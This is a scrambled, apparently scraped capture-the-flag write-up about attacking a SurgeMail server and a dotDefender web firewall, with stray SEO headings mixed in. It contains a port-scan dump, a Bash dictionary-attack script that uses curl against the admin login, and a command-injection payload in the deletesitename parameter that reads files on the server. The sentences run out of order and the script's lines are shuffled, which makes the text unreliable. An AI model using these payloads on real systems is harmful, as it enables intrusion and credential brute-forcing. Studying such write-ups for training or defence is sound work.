With this info, we searched for known vulnerabilities and luckily we found an exploit to the same version that could lead us to get a shell of the system: The vulnerability needed some valid credentials to be exploited, so we looked for a method to enumerate users of webmail, i.e through the “remember your password” feature of the webmail. When connecting to port 143/IMAP, we came up to a banner showing Surgemail’s version used: 3.8k4-4. We tried to connect to the different ports used by Surgemail. Qualcomm poppassd ( Maximum users connected ) SurgeMail pop3d 3.8 k4 -4 SurgeMail imapd 3.8 k4 -4 Surgemail smtpd 3.8 k4 -4 Surgemail smtpd 3.8 k4 -4 Pop3pw pop3 imap smtp tcpwrapped smtp tcpwrapped tcpwrapped ms - term - serv ? tcpwrapped tcpwrapped Open open open open open open open open open open open First of all, we scanned the machine ports in order to find something interesting: 21/ tcp open ftp | _ftp - anon : Anonymous FTP login allowed 25/ tcp open smtp Surgemail smtpd 3.8 k4 -4 80/ tcp open http Surgemail webmail ( DNews based ) | _html - title : SurgeMail Welcome / tcp 110/ tcp 143/ tcp 366/ tcp 465/ tcp 587/ tcp 993/ tcp 995/ tcp 3389/ tcp 7025/ tcp 7443/ tcp When requesting (or any of its clones) a default website from Surgemail Webmail 3 is shown. As we have to find a file called n00bSecret.txt and output this content, injecting the command cat $(find / -name n00bSecret.txt) should do the work: sitename=dotdefeater&deletesitename=dotdefeater cat $(find / -name n00bSecret.txt) &action=deletesite&linenum=15 Great! The content of the file, in other words, the challenge key, is dumped: 5f5f3ea014b42c98530beefabce44e35b896e39567ac8d811d0982afd5e2acfd 66ec854bd5b81672ef9f441f5e00ae7a25b7a7754e1644058777e7f7cfbb905d So this is what we did: SQL Error
Netwinsite surgemail code#
What if we have to exploit in some way dotDefender to access the underlying system? This hypothesis became stronger as we find a Arbitrary Remote Code Execution exploit on exploitDB : As the paper says, we can inject code via a GET parameter called deletesitename. Now what? Fuzzing around, we can’t see any hints or interesting data which could be the challenge key we are searching (which is supposed to be inside a file called n00bSecret.txt). We are inside dotDefender’s control panel.
Netwinsite surgemail password#
When running it with OpenWall lowercase passwords wordlist2, we can see the password is “passwords”. " else # Good news :) echo " Found ! $i " exit fi done rm tmp curl -u admin : $i http :// com / dotDefender > tmp 2 > / dev / null # " Required " is our blind keyword if grep Required tmp > / dev / null then echo " Not $i. As we don’t have any clue about what the password could be, we developed a Bash script to perform a dictionary attack on this auth: # !/ bin / bash # PAINSEC web login fuzzer used in " How Strong is your Fu ? if then echo " Usage : ‘ basename $0 ‘ " exit -1 fi # We loop all over the dictionary for i in ‘ cat $1 ‘ do # We know the user is admin. We are said in it that we must use “admin” as the username. Bingo! A web authentication popup shows up. We tried to mimic our installation on the challenge webpage: And. From the installation we could see that the default installation directory was /dotDefender.
Netwinsite surgemail install#
We then proceeded to download and install a copy of this software on our computer to watch its behaviour. Doing a Google search for “Applicure” and visiting their official website1 we find out we are talking about a company that offers some WAF (this is, web application firewall) technology called dotDefender. We create products for web application protection, including web application firewall, ISA security and IIS security. Checking the sourcecode of this same page we can find a very distinctive sentence in the description label: Applicure is the leading provider of web application security. After many tests, this was the only interesting result we could get. When submitting the form, we are redirected to an “error page” with a “HAHAHA!!” text as the only content. As the form is the only alternative to hack into the webpage (no other relevant details are worth mentioning from the sourcecode) we proceed to do a quick SQL-Injection test inserting a simple quote in both form fields. When visiting we are required to enter a valid username and password into a form in order to access some content, under the leet message “Can you hack me? ”. 2 Phase 2: Serious Business 2.1 “killthen00b” challenge.
0 kommentar(er)
